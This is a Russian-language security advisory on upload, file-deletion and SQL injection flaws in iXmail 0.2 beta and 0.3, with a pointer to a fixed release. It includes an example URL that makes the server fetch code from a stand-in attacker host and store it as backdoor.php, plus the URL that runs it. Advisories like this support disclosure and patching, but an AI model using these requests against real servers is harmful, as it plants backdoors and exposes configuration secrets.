Несколько уязвимостей в iXmail web mail системе

Несколько уязвимостей обнаружены в iXmail web mail  системе. Удаленный пользователь может загружать файлы на сервер и выполнять их. Удаленный пользователь может просматривать и удалять некоторые файлы на сервере и внедрять SQL команды, чтобы получить авторизованный доступ к приложению. 

1. Удаленный авторизованный пользователь может представить специально обработанные переменные '$attach1' и '$attach1_name' к 'xmail_attach.php' сценарию, чтобы загружать произвольные файлы на систему, включая PHP сценарии. Пример:

http://[target]/ixmail_attach.php?submit=1&attach1=http: //[attacker]/badcode.txt&attach1_name=backdoor.php

В примере выше, файл 'badcode.txt' будет записан в tmp каталог в Web директории как 'backdoor.php' файл. PHP код в 'backdoor.php' может быть выполнен (с привилегиями Web сервера) используюя следующий URL:

http://[target]/tmp/backdoor.php

Удаленный авторизованный пользователь может также загрузить файлы, которые фактически находятся на целевом сервере. В результате удаленный пользователь может копировать файлы в инсталляционном каталоге (например 'include/ixmail_config.inc.php') в tmp каталог в Web директории. В результате пользователь может просматривать ixmail конфигурацию.

2. Уязвимость обнаружена в сценарии 'ixmail_netattach.php'. Сценарий позволяет удаленному авторизованному пользователю удалять произвольные файлы, типа сценариев на сервере.

3. Уязвимость авторизации обнаружена в 'index.php'. Удаленный пользователь может сконструировать специально обработанный запрос, чтобы внедрить SQL команды и получить авторизованный доступ к приложению.

Уязвимость обнаружена в iXmail 0.2 beta, 0.3
Для устранения уязвимости, установите обновленную версию программы, которую можно скачать отсюда:
http://www.a-suivre.net/ixmail/index2.php?page=download